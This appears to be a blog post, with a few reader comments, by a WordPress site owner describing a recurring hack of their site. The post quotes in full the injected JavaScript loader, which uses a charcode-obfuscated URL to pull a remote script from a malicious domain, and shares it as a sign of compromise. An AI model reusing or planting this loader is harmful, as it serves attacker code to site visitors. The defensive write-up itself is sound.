This damn people - Sorry for the bad words. Site got hacked again!
You remember how I told you that people are hacking my site? Well, the problem still goes on.
People from everywhere. Meanwhile I am getting this since I've installed wordfence security:
What does people are doing is like inserting a link to this:
If something like this has been entered:
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}/
This will lead from the String.FromCharCode array function to the following url:
scripts.trasnaltemyrecords (i've omitted the rest, but you can still search for this).
If this is found anywhere in any file of your wordpres installation it seems you have been hacked.
No matter how many times I repaired the installation - even when the post comment function is turned off - they somehow found a way to use it.
But now I found out what they do. Though I do not know completely HOW they are doing it.
If someone else know tell me.
I wrote a CSharp-Program today to uncover these things. Now you can find what
104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48
means in an instant. See the screenshot below.
Everytime I find a new encoding I will add it to my uncoding function.
So I can see what's happening in an instant...
Be safe. And hope you'll never encounter the same problems.
If you do just ask me and I'll tell you what you can do about that.
But I cannot yet tell you how to prevent yourself from that happening to your website again.
Recent Comments
3
Check your plugins against the Wordfence list. Make sure they are updated.
It sounds like you have a malicious script installed in the file structure of your site. I'm surprised that Wordfence isn't able to deal with it.
Thanks for the kind words @Labman. :-)
I already did and found out what happened.
I fixed it so far now that no one else has seemed to be able to get in anymore.
All that's left to do is "just" to fix all the files now.
They all point to the malicious domain.
So I've deactivated the plugins at first by naming the folders with a prefixed underscore.
One after another will now be repaired manually by me.
Which will for sure still take a lot of time.
P.S.: If anyone needs some pointers how to fix this if you're encountering the same problems don't hesitate to hit me up.
Because we all know how annyoing this can get, don't we?
:-)
P.S.: To all wealthy affiliates:
Have a beautiful day.
See more comments
That's scary.